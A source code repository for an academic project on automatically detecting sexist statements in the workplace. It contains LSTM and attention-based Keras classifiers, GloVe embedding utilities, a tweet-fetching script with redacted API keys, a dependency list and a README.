num = np.argmax(predV2[k])
if num != y_test[k]:
if int(num) == 1:
v2_fp += 1
elif int(num) == 0:
v2_fn += 1
else:
if int(num) == 1:
v2_tp += 1
elif int(num) == 0:
v2_tn += 1
tp_sum_v[2] += v2_tp
tn_sum_v[2] += v2_tn
fp_sum_v[2] += v2_fp
fn_sum_v[2] += v2_fn
print("0 misclass: " + str(v2_fp / (v2_tn + v2_fp)))
print("1 misclass: " + str(v2_fn / (v2_tp + v2_fn)))
print("Overall accuracy: " + str(acc2))
acc_sum_v[2] += acc2
gc.collect()
plot_model(model_v2, to_file='model_v2.png')
# V3 model
if runModels[3]:
v3_tp, v3_tn, v3_fp, v3_fn = 0, 0, 0, 0
model_v3 = modelV3((maxLen,), word_to_vec_map, word_to_index, lay1_num=128, lay2_num=128)
model_v3.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
X_train_indices = sentences_to_indices(X_train, word_to_index, maxLen)
y_train_oh = convert_to_one_hot(y_train, C=2)
model_v3.fit(X_train_indices, y_train_oh, epochs=25, batch_size=32, shuffle=True)
X_test_indices = sentences_to_indices(X_test, word_to_index, max_len=maxLen)
y_test_oh = convert_to_one_hot(y_test, C=2)
loss, acc3 = model_v3.evaluate(X_test_indices, y_test_oh)
predV2 = model_v3.predict(X_test_indices)
for k in range(len(X_test)):
num = np.argmax(predV2[k])
if num != y_test[k]:
if int(num) == 1:
v3_fp += 1
elif int(num) == 0:
v3_fn += 1
else:
if int(num) == 1:
v3_tp += 1
elif int(num) == 0:
v3_tn += 1
tp_sum_v[3] += v3_tp
tn_sum_v[3] += v3_tn
fp_sum_v[3] += v3_fp
fn_sum_v[3] += v3_fn
acc_sum_v[3] += acc3
print("0 misclass: " + str(v3_fp / (v3_tn + v3_fp)))
print("1 misclass: " + str(v3_fn / (v3_tp + v3_fn)))
print("Overall accuracy: " + str(acc3))
gc.collect()
plot_model(model_v3, to_file='model_v3.png')
# V4 Model
if runModels[4]:
v4_tp, v4_tn, v4_fp, v4_fn = 0, 0, 0, 0
STAMP = 'simple_lstm_glove_vectors'
early_stopping = EarlyStopping(monitor='val_loss', patience=5)
bst_model_path = STAMP + '.h5'
model_checkpoint = ModelCheckpoint(bst_model_path, save_best_only=True, save_weights_only=True)
model_v4 = modelV4((maxLen,), word_to_vec_map, word_to_index, lay1_num=128, lay2_num=128, n_features=maxLen,
isRandom=False, isAttention=True)
model_v4.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
X_train_indices = sentences_to_indices(X_train, word_to_index, maxLen)
y_train_oh = convert_to_one_hot(y_train, C=2)
model_v4.fit(X_train_indices, y_train_oh, epochs=30, batch_size=32, shuffle=True,
callbacks=[early_stopping, model_checkpoint])
X_test_indices = sentences_to_indices(X_test, word_to_index, max_len=maxLen)
y_test_oh = convert_to_one_hot(y_test, C=2)
loss, acc4 = model_v4.evaluate(X_test_indices, y_test_oh)
predV2 = model_v4.predict(X_test_indices)
for k in range(len(X_test)):
num = np.argmax(predV2[k])
if num != y_test[k]:
if X_test[k] in wrongs_dict:
wrongs_dict[X_test[k]] += 1
else:
wrongs_dict[X_test[k]] = 1
if int(num) == 1:
v4_fp += 1
elif int(num) == 0:
v4_fn += 1
else:
if int(num) == 1:
v4_tp += 1
elif int(num) == 0:
v4_tn += 1
tp_sum_v[4] += v4_tp
tn_sum_v[4] += v4_tn
fp_sum_v[4] += v4_fp
fn_sum_v[4] += v4_fn
acc_sum_v[4] += acc4
print("0 misclass: " + str(v4_fp / (v4_tn + v4_fp)))
print("1 misclass: " + str(v4_fn / (v4_tp + v4_fn)))
print("Overall accuracy: " + str(acc4))
print("================================================================================")
acc_avg_v = np.divide(acc_sum_v, float(it + 1))
v_num = len(acc_sum_v)
wrongs_dict_worst = dict((k, v) for k, v in wrongs_dict.items() if v >= (int((it + 1) / 2) + 1))
pp.pprint(wrongs_dict_worst)
for v in range(1, v_num):
if not (tp_sum_v[v] == 0 or fp_sum_v[v] == 0 or fn_sum_v[v] == 0):
p = tp_sum_v[v] / (tp_sum_v[v] + fp_sum_v[v])
r = tp_sum_v[v] / (tp_sum_v[v] + fn_sum_v[v])
f1 = (2 * p * r) / (p + r)
print("=============== MODEL V" + str(v) + " =====================")
print("V" + str(v) + " Accuracy: " + str(acc_avg_v[v]))
print("Total Number of 0 labels: " + str(num_0s_sum) +
"\tNumber Mislabeled: " + str(fp_sum_v[v]) +
"\tMislabel Rate: " + str(fp_sum_v[v] / num_0s_sum))
print("Total Number of 1 labels: " + str(num_1s_sum) +
"\tNumber Mislabeled: " + str(fn_sum_v[v]) +
"\tMislabel Rate: " + str(fn_sum_v[v] / num_1s_sum))
print("Precision: " + str(p))
print("Recall: " + str(r))
print("F1 Score: " + str(f1))
<file_sep>/SD_utils.py
import csv
import numpy as np
import emoji
import pandas as pd
import re
import contractions
#from spellchecker import SpellChecker
import matplotlib.pyplot as plt
#spell = SpellChecker()
def read_glove_vecs(glove_file):
with open(glove_file, encoding="utf8") as f:
words = set()
word_to_vec_map = {}
for line in f:
line = line.strip().split()
curr_word = line[0]
words.add(curr_word)
word_to_vec_map[curr_word] = np.array(line[1:], dtype=np.float64)
i = 1
words_to_index = {}
index_to_words = {}
for w in sorted(words):
words_to_index[w] = i
index_to_words[i] = w
i = i + 1
return words_to_index, index_to_words, word_to_vec_map
def softmax_SD(x):
"""Compute softmax values for each sets of scores in x."""
e_x = np.exp(x - np.max(x))
return e_x / e_x.sum()
def remove_special_characters(text, remove_digits=False):
pattern = r'[^a-zA-Z0-9\s]' if not remove_digits else r'[^a-zA-Z\s]'
text = re.sub(pattern, '', text)
return text
def read_csv(filename='data/SD_dataset_FINAL.csv'):
phrase = []
labels = []  # renamed from `emoji` to avoid shadowing the imported emoji module
with open(filename) as csvDataFile:
csvReader = csv.reader(csvDataFile)
special_char_pattern = re.compile(r'([{.(-)!}])')
for row in csvReader:
num_col = len(row)
s = ""
for c_n in range(num_col - 1):
s += row[c_n]
s = re.sub(',', ':', s)
s = contractions.fix(s)
s = special_char_pattern.sub(" \\1 ", s)
s = remove_special_characters(s, remove_digits=True)
phrase.append(s)
labels.append(row[num_col - 1])
X = np.asarray(phrase)
Y = np.asarray(labels, dtype=int)
return X, Y
def convert_to_one_hot(Y, C):
Y = np.eye(C)[Y.reshape(-1)]
return Y
label_dictionary = {"0": "Neutral/Not Extremely Sexist",
"1": "Sexist"}
def label_to_name(label):
"""
Converts a label (int or string) into the corresponding emoji code (string) ready to be printed
"""
return emoji.emojize(label_dictionary[str(label)], use_aliases=True)
def print_predictions(X, pred):
print()
for i in range(X.shape[0]):
print(X[i], label_to_name(int(pred[i])))
def plot_confusion_matrix(y_actu, y_pred, title='Confusion matrix', cmap=plt.cm.gray_r):
df_confusion = pd.crosstab(y_actu, y_pred.reshape(y_pred.shape[0],), rownames=['Actual'], colnames=['Predicted'], margins=True)
df_conf_norm = df_confusion / df_confusion.sum(axis=1)
plt.matshow(df_confusion, cmap=cmap) # imshow
#plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(df_confusion.columns))
plt.xticks(tick_marks, df_confusion.columns, rotation=45)
plt.yticks(tick_marks, df_confusion.index)
#plt.tight_layout()
plt.ylabel(df_confusion.index.name)
plt.xlabel(df_confusion.columns.name)
def predict(X, Y, W, b, word_to_vec_map):
"""
Given X (sentences) and Y (emoji indices), predict emojis and compute the accuracy of your model over the given set.
Arguments:
X -- input data containing sentences, numpy array of shape (m, None)
Y -- labels, containing index of the label emoji, numpy array of shape (m, 1)
Returns:
pred -- numpy array of shape (m, 1) with your predictions
"""
m = X.shape[0]
pred = np.zeros((m, 1))
for j in range(m): # Loop over training examples
# Split jth test example (sentence) into list of lower case words
words = X[j].lower().split()
# Average words' vectors
avg = np.zeros((50,))
for w in words:
if w in word_to_vec_map:
avg += word_to_vec_map[w]
avg = avg/len(words)
# Forward propagation
Z = np.dot(W, avg) + b
A = softmax_SD(Z)
pred[j] = np.argmax(A)
acc = np.mean((pred[:] == Y.reshape(Y.shape[0],1)[:]))
print("Accuracy: " + str(acc))
return pred, acc<file_sep>/twitterSexistExtract.py
import collections
import math
import sys
import twitter
import pandas as pd
import time
c_k = '<KEY>'
c_sk = '<KEY>'
a_t_k = '816115737177<KEY>'
a_t_sk = '<KEY>'
raw_data_loc = 'WH_dataset_withText_save'
api = twitter.Api(consumer_key=c_k,
consumer_secret=c_sk,
access_token_key=a_t_k,
access_token_secret=a_t_sk,
sleep_on_rate_limit=True)
tID_raw = pd.read_csv(raw_data_loc)
tID_text = tID_raw.values
print(tID_text)
tID_text_toReplace = tID_text.copy()
i = 0
for ind, id, label in tID_text:
if label != 'racism' and label != 0 and label != 1:
print(id)
if str(id) != 'nan' and '#' not in id and id != 'NA' and id != 'NAr' and ' ' not in id:
id = int(id)
tweet = ''
try:
tweet = api.GetStatus(id).text
except twitter.error.TwitterError as e:
print(str(e))
tweet = 'error in fetching'
tID_text_toReplace[i, 1] = tweet
tID_text_toReplace[i, 2] = 1 if label == 'sexism' else 0
pd.DataFrame(tID_text_toReplace).to_csv('WH_dataset_withText')
elif label != 0 and label != 1:  # "or" here made the condition always true
tID_text_toReplace[i, 2] = 'NA'
i += 1
# time.sleep(0.5)
print(i)
print("Test status: " + str(api.GetStatus('572342978255048705').text))<file_sep>/requirements.txt
absl-py==0.3.0
alabaster==0.7.10
anaconda-client==1.6.14
anaconda-navigator==1.8.7
anaconda-project==0.8.2
appnope==0.1.0
asn1crypto==0.24.0
astor==0.7.1
astroid==1.6.3
astropy==3.0.2
attrs==18.1.0
audioread==2.1.6
Babel==2.5.3
backcall==0.1.0
backports.shutil-get-terminal-size==1.0.0
beautifulsoup4==4.6.0
bert-embedding==1.0.1
bitarray==0.8.1
bkcharts==0.2
blaze==0.11.3
bleach==3.0.2
bokeh==0.12.16
boto==2.48.0
boto3==1.9.157
botocore==1.12.157
Bottleneck==1.2.1
cachetools==3.1.1
certifi==2019.11.28
cffi==1.11.5
chardet==3.0.4
Click==7.0
cloudpickle==0.5.3
clyent==1.2.2
colorama==0.3.9
comtypes==1.1.4
conda==4.8.1
conda-build==3.10.5
conda-package-handling==1.3.11
conda-verify==2.0.0
contextlib2==0.5.5
contractions==0.0.18
cryptography==2.7
cycler==0.10.0
Cython==0.28.2
cytoolz==0.9.0.1
dask==0.17.5
datashape==0.5.4
decorator==4.3.0
defusedxml==0.5.0
distributed==1.21.8
distro==1.4.0
docopt==0.6.2
docutils==0.14
emoji==0.5.2
entrypoints==0.2.3
et-xmlfile==1.0.1
Faker==1.0.5
fastcache==1.0.2
ffmpeg==1.4
filelock==3.0.4
Flask==1.0.2
Flask-Cors==3.0.4
future==0.16.0
gast==0.2.0
gcloud==0.18.3
gensim==3.7.3
gevent==1.3.0
glob2==0.6
gluonnlp==0.6.0
googleapis-common-protos==1.6.0
graphviz==0.8.4
greenlet==0.4.13
grpcio==1.12.1
h5py==2.7.1
heapdict==1.0.0
html5lib==1.0.1
httplib2==0.14.0
idna==2.6
imageio==2.3.0
imagesize==1.0.0
inexactsearch==1.0.2
intervaltree==2.1.0
ipykernel==4.8.2
ipython==6.4.0
ipython-genutils==0.2.0
ipywidgets==7.2.1
isort==4.3.4
itsdangerous==0.24
jdcal==1.4
jedi==0.12.0
Jinja2==2.10
jmespath==0.9.4
joblib==0.13.2
JPype1==0.7.0
jsonschema==2.6.0
jupyter==1.0.0
jupyter-client==5.2.3
jupyter-console==5.2.0
jupyter-core==4.4.0
jupyterlab==0.32.1
jupyterlab-launcher==0.10.5
Keras==2.2.4
Keras-Applications==1.0.7
Keras-Preprocessing==1.0.9
kiwisolver==1.0.1
lazy-object-proxy==1.3.1
libarchive-c==2.8
librosa==0.6.2
llvmlite==0.23.1
locket==0.2.0
lxml==4.2.1
magenta==0.3.12
Markdown==2.6.11
MarkupSafe==1.0
matplotlib==2.2.2
mccabe==0.6.1
menuinst==1.4.14
mido==1.2.6
mir-eval==0.4
mistune==0.8.3
mkl-fft==1.0.0
mkl-random==1.0.1
mkl-service==2.0.2
more-itertools==4.1.0
mpmath==1.0.0
msgpack-python==0.5.6
multipledispatch==0.5.0
music21==5.3.0
mxnet==1.4.0
navigator-updater==0.2.1
nbconvert==5.3.1
nbformat==4.4.0
networkx==2.1
nltk==3.3
nose==1.3.7
notebook==5.5.0
numba==0.38.0
numexpr==2.6.8
numpy==1.14.6
numpydoc==0.8.0
oauth2client==4.1.3
oauthlib==3.0.1
odo==0.5.1
olefile==0.45.1
openpyxl==2.5.3
packaging==17.1
pandas==0.23.0
pandoc==1.0.2
pandocfilters==1.4.2
parso==0.2.0
partd==0.3.8
path.py==11.0.1
pathlib2==2.3.2
patsy==0.5.0
pep8==1.7.1
pickleshare==0.7.4
Pillow==5.1.0
pkginfo==1.4.2
pluggy==0.6.0
ply==3.11
pretty-midi==0.2.8
prompt-toolkit==1.0.15
protobuf==3.6.0
psutil==5.4.5
py==1.5.3
pyasn1==0.4.7
pyasn1-modules==0.2.6
pycodestyle==2.4.0
pycosat==0.6.3
pycparser==2.18
pycrypto==2.6.1
pycurl==7.43.0.3
pydot==1.4.1
pyflakes==1.6.0
Pygments==2.2.0
pylint==1.8.4
pyodbc==4.0.23
pyOpenSSL==18.0.0
pyparsing==2.2.0
PySocks==1.6.8
pytest==3.5.1
pytest-arraydiff==0.2
pytest-astropy==0.3.0
pytest-doctestplus==0.1.3
pytest-openfiles==0.3.0
pytest-remotedata==0.2.1
python-dateutil==2.7.3
python-rtmidi===1.1.1.dev0.dev
python-twitter==3.5
pytz==2018.4
PyWavelets==0.5.2
pywin32==223
pywinpty==0.5.1
PyYAML==3.12
pyzmq==17.0.0
QtAwesome==0.4.4
qtconsole==4.3.1
QtPy==1.4.1
requests==2.18.4
requests-oauthlib==1.2.0
resampy==0.2.1
rope==0.10.7
rsa==4.0
ruamel-yaml==0.15.35
s3transfer==0.2.0
scikit-image==0.13.1
scikit-learn==0.21.2
scipy==1.1.0
seaborn==0.8.1
Send2Trash==1.5.0
silpa-common==0.3
simplegeneric==0.8.1
singledispatch==3.4.0.3
six==1.12.0
smart-open==1.8.3
snowballstemmer==1.2.1
sortedcollections==0.6.1
sortedcontainers==1.5.10
soundex==1.1.3
spark-parser==1.8.7
spellchecker==0.4
Sphinx==1.7.4
sphinxcontrib-websupport==1.0.1
spyder==3.2.8
SQLAlchemy==1.2.7
statsmodels==0.9.0
sympy==1.1.1
tables==3.4.3
tabula-py==1.3.1
tblib==1.3.2
tensorboard==1.9.0
tensorflow==1.9.0
termcolor==1.1.0
terminado==0.8.1
testpath==0.3.1
text-unidecode==1.2
toolz==0.9.0
torch==1.4.0
torchvision==0.5.0
tornado==5.0.2
tqdm==4.31.1
traitlets==4.3.2
typing==3.6.6
uncompyle6==3.2.3
unicodecsv==0.14.1
urllib3==1.22
wcwidth==0.1.7
webencodings==0.5.1
Werkzeug==0.14.1
widgetsnbextension==3.2.1
wikipedia==1.4.0
win-inet-pton==1.0.1
win-unicode-console==0.5
wincertstore==0.2
wrapt==1.10.11
xdis==3.8.7
xgboost==0.90
xlrd==1.1.0
XlsxWriter==1.0.4
xlwings==0.11.8
xlwt==1.3.0
zict==0.1.3
<file_sep>/README.md
# Automatic Detection of Sexist Statements Commonly Used at the Workplace
Repository for "Automatic Detection of Sexist Statements Commonly Used at the Workplace" by <NAME> & <NAME>. The associated paper was accepted to the PAKDD Workshop on Learning Data Representation for Clustering (LDRC 2020).
Associated Paper: https://hal.archives-ouvertes.fr/hal-02573576/
## Abstract
> Detecting hate speech in the workplace is a unique classification task, as the underlying social context implies a subtler version of conventional hate speech. Applications regarding a state-of-the-art workplace sexism detection model include aids for Human Resources departments, AI chatbots and sentiment analysis. Most existing hate speech detection methods, although robust and accurate, focus on hate speech found on social media, specifically Twitter. The context of social media is much more anonymous than the workplace, therefore it tends to lend itself to more aggressive and “hostile” versions of sexism. Therefore, datasets with large amounts of “hostile” sexism have a slightly easier detection task since “hostile” sexist statements can hinge on a couple words that, regardless of context, tip the model off that a statement is sexist. In this paper we present a dataset of sexist statements that are more likely to be said in the workplace as well as a deep learning model that can achieve state-of-the art results. Previous research has created state-of-the-art models to distinguish “hostile” and “benevolent” sexism based simply on aggregated Twitter data. Our deep learning methods, initialized with GloVe or random word embeddings, use LSTMs with attention mechanisms to outperform those models on a more diverse, filtered dataset that is more targeted towards workplace sexism, leading to an F1 score of 0.88.
## Getting Started
### Environment
After cloning the repository, enter the resulting folder and run ```pip install -r requirements.txt```. Installing everything in ```requirements.txt``` is recommended, though some of the packages may be superfluous, as most of this paper's development occurred in PyCharm.
### Downloading Dependent Data
#### GloVe Word Embeddings
Download a GloVe dataset from https://nlp.stanford.edu/projects/glove/. For both memory considerations and replication of this research, download the 6 billion token, 50D word vectors http://nlp.stanford.edu/data/glove.6B.zip. 50 dimensions were chosen over larger embedding dimensions in order to prevent overfitting/memorization during training on such a small dataset.
A similarly trained gender balanced GloVe dataset (GN-GloVe) can be downloaded here: https://drive.google.com/file/d/1v82WF43w-lE-vpZd0JC1K8WYZQkTy_ii/view
After downloading the dataset, make sure to either name your embedding text file ```vectors.txt``` after placing it in the ```data``` folder, or edit ```embedding_fn``` in ```SexisteDetectionMain.py``` (line 33) so it points to the correct filepath.
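For reference, ```read_glove_vecs``` in ```SD_utils.py``` expects each line of ```vectors.txt``` to be a token followed by its space-separated vector components. A minimal sketch of that parsing (the two sample lines below are made up, not real GloVe data):

```python
import numpy as np

# Two made-up lines in the GloVe text format: token, then vector components.
sample = "the 0.1 0.2 0.3\nshe 0.4 0.5 0.6"

word_to_vec_map = {}
for line in sample.splitlines():
    parts = line.strip().split()
    # token maps to a float64 vector, exactly as read_glove_vecs builds it
    word_to_vec_map[parts[0]] = np.array(parts[1:], dtype=np.float64)

print(word_to_vec_map["she"])  # [0.4 0.5 0.6]
```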
#### Sexist Workplace Statements Dataset
The dataset we used for training is provided in ```data/SD_dataset_FINAL.csv```. It is also present on Kaggle: https://www.kaggle.com/dgrosz/sexist-workplace-statements. If you would like to update the dataset and reupload, either place it in the ```data``` folder and rename it to ```SD_dataset_FINAL.csv``` or edit the ```sexist_dataset_fn``` variable on line 32 of ```SexisteDetectionMain.py```.
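Each row of the CSV is a phrase followed by a 0/1 label, and ```convert_to_one_hot``` in ```SD_utils.py``` turns the label column into the two-column targets the models train on via an ```np.eye``` lookup. A small illustration with made-up labels:

```python
import numpy as np

# Made-up label column mirroring the dataset's 0/1 annotations.
labels = np.array([0, 1, 1])

# convert_to_one_hot(Y, C) in SD_utils.py is exactly this np.eye lookup:
one_hot = np.eye(2)[labels.reshape(-1)]
print(one_hot)  # row i is [1, 0] for label 0 and [0, 1] for label 1
```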
### Running the Models
After all the embeddings and the sexist workplace statements dataset are properly loaded and referenced, run ```SexisteDetectionMain.py```. There are 8 versions of the model that we have coded, each with its own architecture:
- ModelV1: word embeddings are concatenated per phrase, averaged and put through logistic regression
- ModelV2: word embeddings are sequentially pushed through a Vanilla Unidirectional LSTM architecture, specifically ```Embedding->LSTM->Dropout->LSTM->FullyConnected->Softmax```
- ModelV3: word embeddings (you can toggle between random embeddings and loaded GloVe embeddings in the function call) are sequentially pushed through a Bidirectional LSTM architecture, specifically ```Embedding->BiLSTM->Dropout->BiLSTM->FullyConnected->Softmax```
- ModelV4: embeddings (you can toggle between random embeddings and loaded GloVe embeddings in the function call) are pushed through a Bidirectional LSTM architecture with attention, specifically ```Embedding->BiLSTM->Dropout->BiLSTM->Attention->FullyConnected->Softmax```
If you don't change the initial code and run ```SexisteDetectionMain.py```, all of the listed models will run sequentially, performing 10 iterations of training and testing (the respective training/testing sets are chosen at random for each iteration). You can edit the number of iterations on line 335, and you can choose which models to run via the ```runModels``` boolean list (lines 342-346).
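ModelV4's attention (the same pattern appears in ```lstm_model``` in ```lstm.py```) scores each BiLSTM timestep, softmaxes the scores, and collapses the sequence into a weighted sum. A NumPy sketch of that reduction, with made-up stand-in dimensions and random weights:

```python
import numpy as np

def softmax(x):
    # numerically stable softmax, as in softmax_SD in SD_utils.py
    e = np.exp(x - np.max(x))
    return e / e.sum()

# Made-up stand-ins: 5 timesteps of 128-unit BiLSTM output, and the
# weight vector of a Dense(1, activation='tanh') scoring layer.
T, H = 5, 128
rng = np.random.default_rng(0)
hidden = rng.standard_normal((T, H))
score_w = rng.standard_normal(H)

scores = np.tanh(hidden @ score_w)                   # one scalar score per timestep
weights = softmax(scores)                            # attention distribution, sums to 1
sent_repr = (weights[:, None] * hidden).sum(axis=0)  # weighted sum over time

print(sent_repr.shape)  # (128,)
```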
For any questions, please email <NAME> at _dgrosz 'at' stanford 'dot' edu_.
<file_sep>/data_handler.py
import json
import pdb
import codecs
import pandas as pd
from SD_utils import read_csv
def get_data():
# pd.read_csv returns a DataFrame, which cannot be unpacked into (X, y);
# use the repo's own CSV reader from SD_utils instead
X, _ = read_csv('data/SD_dataset_FINAL.csv')
#pdb.set_trace()
return X
if __name__=="__main__":
tweets = get_data()
males, females = {}, {}
with open('./tweet_data/males.txt') as f:
males = set([w.strip() for w in f.readlines()])
with open('./tweet_data/females.txt') as f:
females = set([w.strip() for w in f.readlines()])
males_c, females_c, not_found = 0, 0, 0
for t in tweets:
if t['name'] in males:
males_c += 1
elif t['name'] in females:
females_c += 1
else:
not_found += 1
pdb.set_trace()
<file_sep>/lstm.py
from SexisteDetectionMain import pretrained_embedding_layer
from data_handler import get_data
import argparse
from keras.preprocessing.sequence import pad_sequences
from keras.layers import Embedding, Input, LSTM, Bidirectional, RepeatVector, Permute, merge, Lambda
from keras.models import Sequential, Model
from keras.layers import Activation, Dense, Dropout, Embedding, Flatten, Input, Convolution1D, MaxPooling1D, \
GlobalMaxPooling1D
import keras.backend as K
import numpy as np
import pandas as pd
import pdb, json
from sklearn.metrics import make_scorer, f1_score, accuracy_score, recall_score, precision_score, classification_report, \
precision_recall_fscore_support
from sklearn.ensemble import GradientBoostingClassifier, RandomForestClassifier
from sklearn.model_selection import train_test_split
from gensim.parsing.preprocessing import STOPWORDS
from sklearn.model_selection import KFold
from keras.utils import np_utils
import codecs
from sklearn.utils import shuffle
import operator
import gensim, sklearn
from string import punctuation
from collections import defaultdict
from batch_gen import batch_gen
import sys
from SD_utils import *
from nltk import tokenize as tokenize_nltk
from my_tokenizer import glove_tokenize
from SD_utils import read_glove_vecs
EMBEDDING_DIM = None
GLOVE_MODEL_FILE = None
SEED = 42
NO_OF_FOLDS = 10
CLASS_WEIGHT = None
LOSS_FUN = None
OPTIMIZER = None
KERNEL = None
TOKENIZER = None
MAX_SEQUENCE_LENGTH = None
INITIALIZE_WEIGHTS_WITH = None
LEARN_EMBEDDINGS = None
EPOCHS = 10
BATCH_SIZE = 512
SCALE_LOSS_FUN = None
vocab, reverse_vocab = {}, {}
freq = defaultdict(int)
tweets = {}
word2vec_model = None
def sentences_to_indices(X_s, word_to_index, max_len):
"""
Converts an array of sentences (strings) into an array of indices corresponding to words in the sentences.
The output shape should be such that it can be given to `Embedding()` (described in Figure 4).
Arguments:
X -- array of sentences (strings), of shape (m, 1)
word_to_index -- a dictionary containing the each word mapped to its index
max_len -- maximum number of words in a sentence. You can assume every sentence in X is no longer than this.
Returns:
X_indices -- array of indices corresponding to words in the sentences from X, of shape (m, max_len)
"""
m = len(X_s) # number of training examples
print(m)
### START CODE HERE ###
# Initialize X_indices as a numpy matrix of zeros and the correct shape (≈ 1 line)
X_indices = np.zeros((m, max_len)) # If there is more than one dimension use ()
for i in range(m): # loop over training examples
# Convert the ith training sentence in lower case and split is into words. You should get a list of words.
sentence_words = X_s[i].lower().split()
j = 0
for w in sentence_words:
if j < max_len and w in word_to_index:
X_indices[i, j] = word_to_index[w]
j = j + 1
### END CODE HERE ###
return X_indices
def get_embedding(word):
# return
try:
return word2vec_model[word]
except Exception as e:
return np.zeros(EMBEDDING_DIM)
def get_embedding_weights():
embedding = np.zeros((len(vocab) + 1, EMBEDDING_DIM))
n = 0
for k, v in vocab.items():
try:
embedding[v] = word2vec_model[k]
except:
n += 1
pass
return embedding
def select_tweets():
# selects the tweets as in mean_glove_embedding method
# Processing
tweets = get_data()
X, Y = [], []
tweet_return = []
for tweet in tweets:
_emb = 0
words = TOKENIZER(tweet['text'].lower())
for w in words:
if w in word2vec_model: # Check if embeeding there in GLove model
_emb += 1
if _emb: # Not a blank tweet
tweet_return.append(tweet)
# pdb.set_trace()
return tweet_return
def gen_vocab(tweets):
# Processing
vocab_index = 1
for tweet in tweets:
text = TOKENIZER(tweet.lower())
text = ' '.join([c for c in text if c not in punctuation])
words = text.split()
#words = [word for word in words if word not in STOPWORDS]
#print(words)
for word in words:
if word not in vocab:
vocab[word] = vocab_index
reverse_vocab[vocab_index] = word # generate reverse vocab as well
vocab_index += 1
freq[word] += 1
vocab['UNK'] = len(vocab) + 1
vocab['bsss'] = len(vocab) + 2
reverse_vocab[len(vocab)] = 'UNK'
reverse_vocab[len(vocab) + 1] = 'bsss'
def filter_vocab(k):
global freq, vocab
pdb.set_trace()
freq_sorted = sorted(freq.items(), key=operator.itemgetter(1))
tokens = freq_sorted[:k]
vocab = dict(zip(tokens, range(1, len(tokens) + 1)))
vocab['UNK'] = len(vocab) + 1
def gen_sequence(tweets, y):
X = []
for tweet in tweets:
text = TOKENIZER(tweet.lower())
text = ' '.join([c for c in text if c not in punctuation])
words = text.split()
# words = [word for word in words if word not in STOPWORDS]
seq, _emb = [], []
for word in words:
if word in word_to_index:
seq.append(word_to_index[word])
X.append(seq)
return X, y
def shuffle_weights(model):
weights = model.get_weights()
weights = [np.random.permutation(w.flat).reshape(w.shape) for w in weights]
model.set_weights(weights)
def lstm_model(sequence_length, embedding_dim):
model_variation = 'LSTM'
print('Model variation is %s' % model_variation)
sentence_indices = Input(shape=sequence_length, dtype='int32')
# the unused Sequential() and vocab-sized Embedding were dead code; the
# pretrained GloVe embedding layer below is what actually feeds the model
embedding_layer = pretrained_embedding_layer(word_to_vec_map, word_to_index)
embeddings = embedding_layer(sentence_indices)
X = Bidirectional(LSTM(64, return_sequences=True), input_shape=sequence_length)(embeddings)
X = Dropout(0.5)(X)
# X = Bidirectional(LSTM(64, return_sequences=False), input_shape=sequence_length)(X)
attention = Dense(1, activation='tanh')(X)
attention = Flatten()(attention)
attention = Activation('softmax')(attention)
attention = RepeatVector(128)(attention)
attention = Permute([2, 1])(attention)
sent_representation = merge.Multiply()([X, attention])
sent_representation = Lambda(lambda xin: K.sum(xin, axis=1))(sent_representation)
X = Dropout(0.5)(sent_representation)
X = Dense(2, activation='softmax')(X)
X = Activation('softmax')(X)
model_lstm = Model(inputs=sentence_indices, outputs=X)
model_lstm.compile(loss=LOSS_FUN, optimizer=OPTIMIZER, metrics=['accuracy'])
print(model_lstm.summary())
return model_lstm
def train_LSTM(X, y, model, inp_dim, weights, epochs=EPOCHS, batch_size=BATCH_SIZE):
cv_object = KFold(n_splits=NO_OF_FOLDS, shuffle=True, random_state=42)
p, r, f1 = 0., 0., 0.
p1, r1, f11 = 0., 0., 0.
sentence_len = X.shape[1]
print(NO_OF_FOLDS)
for train_index, test_index in cv_object.split(X):
if INITIALIZE_WEIGHTS_WITH == "glove":
model.layers[1].set_weights([weights])
elif INITIALIZE_WEIGHTS_WITH == "random":
shuffle_weights(model)
else:
return
X_train, y_train = X[train_index], y[train_index]
X_test, y_test = X[test_index], y[test_index]
y_train = y_train.reshape((len(y_train), 1))
X_temp = np.hstack((X_train, y_train))
for epoch in range(epochs):
for X_batch in batch_gen(X_temp, batch_size):
x = X_batch[:, :sentence_len]
y_temp = X_batch[:, sentence_len]
class_weights = None
if SCALE_LOSS_FUN:
class_weights = {}
class_weights[0] = np.where(y_temp == 0)[0].shape[0] / float(len(y_temp))
class_weights[1] = np.where(y_temp == 1)[0].shape[0] / float(len(y_temp))
try:
y_temp = convert_to_one_hot(y_temp, C=2)
except Exception as e:
print(e)
print(y_temp)
# print(x.shape)
# print(y_temp.shape)
# print("HERE WE GO")
loss, acc = model.train_on_batch(x, y_temp, class_weight=class_weights)
y_pred = model.predict_on_batch(X_test)
y_pred = np.argmax(y_pred, axis=1)
print(classification_report(y_test, y_pred))
print(precision_recall_fscore_support(y_test, y_pred))
print(y_pred)
p += precision_score(y_test, y_pred, average='weighted')
p1 += precision_score(y_test, y_pred, average='micro')
r += recall_score(y_test, y_pred, average='weighted')
r1 += recall_score(y_test, y_pred, average='micro')
f1 += f1_score(y_test, y_pred, average='weighted')
f11 += f1_score(y_test, y_pred, average='micro')
print("macro results are")
print("average precision is " + str(p / NO_OF_FOLDS))
print("average recall is " + str(r / NO_OF_FOLDS))
print("average f1 is " + str(f1 / NO_OF_FOLDS))
print("micro results are")
print("average precision is " + str(p1 / NO_OF_FOLDS))
print("average recall is " + str(r1 / NO_OF_FOLDS))
print("average f1 is " + str(f11 / NO_OF_FOLDS))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='LSTM based models for twitter Hate speech detection')
parser.add_argument('-f', '--embeddingfile', required=True)
parser.add_argument('-d', '--dimension', required=True)
parser.add_argument('--tokenizer', choices=['glove', 'nltk'], required=True)
parser.add_argument('--loss', default=LOSS_FUN, required=True)
parser.add_argument('--optimizer', default=OPTIMIZER, required=True)
parser.add_argument('--epochs', default=EPOCHS, required=True)
parser.add_argument('--batch-size', default=BATCH_SIZE, required=True)
parser.add_argument('-s', '--seed', default=SEED)
parser.add_argument('--folds', default=NO_OF_FOLDS)
parser.add_argument('--kernel', default=KERNEL)
parser.add_argument('--class_weight')
parser.add_argument('--initialize-weights', choices=['random', 'glove'], required=True)
parser.add_argument('--learn-embeddings', action='store_true', default=False)
parser.add_argument('--scale-loss-function', action='store_true', default=False)
args = parser.parse_args()
GLOVE_MODEL_FILE = str(args.embeddingfile)
